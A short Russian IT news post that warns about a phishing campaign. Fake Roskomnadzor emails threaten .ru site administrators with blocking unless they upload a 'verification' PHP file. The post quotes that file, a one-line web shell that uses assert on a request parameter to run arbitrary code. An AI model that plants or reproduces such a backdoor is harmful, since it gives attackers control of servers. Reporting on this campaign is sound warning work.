Заметки из мира IT

В стиле минимализм

Злоумышленники рассылают поддельные письма от Роскомнадзора, угрожая блокировкой От имени ведомства мошенники требуют у администраторов сайтов разместить на своих серверах вредоносный файл. Как стало известно,...

Злоумышленники рассылают поддельные письма от Роскомнадзора, угрожая блокировкой

От имени ведомства мошенники требуют у администраторов сайтов разместить на своих серверах вредоносный файл. Как стало известно, злоумышленники запустили вредоносную кампанию якобы от имени Роскомнадзора. 25-26 августа нынешнего года администраторы доменных имен в зоне .ru получили электронную рассылку, подписанную ведомством.

В письмах, отправленных с адреса zapret-info@roskomnadzor.org, сказано, что получатель должен разместить на сервере файл с названием reestr-id198617.php, который необходим для его идентификации в качестве администратора доменного имени.

Похоже на то, что мошенники решили воспользоваться ажиотажем вокруг внесения в реестр запрещенных сайтов и дальнейшего исключения из него «Википедии» за статью о наркотическом веществе. Поскольку блокировка ресурса в РФ осуществляется по решению суда, в фальшивых письмах от Роскомнадзора злоумышленники также ссылаются на судебное постановление, а точнее, на решение Новокуйбышевского городского суда Самарской области.

В письме идет речь о том, что аудитория сайта, администратором которого является потенциальная жертва, насчитывает свыше трех тысяч человек в сутки. В связи с этим получатель письма должен идентифицировать себя как администратора сайта. Для этого необходимо создать в корневой директории ресурса папку reestr, а в ней – файл reestr-id198617.php с текстом:

<?php

/*Подтверждение доменного имени www.ХХХХХ.ru*/

assert(stripslashes($_REQUEST[roskomnadzor]));?>

Отметим, что функция assert выполняет вредоносные инструкции.

В случае невыполнения «решения суда» в течение 72 часов с момента получения письма сайту грозит блокировка на территории РФ.

admin

Яндекс.Метрика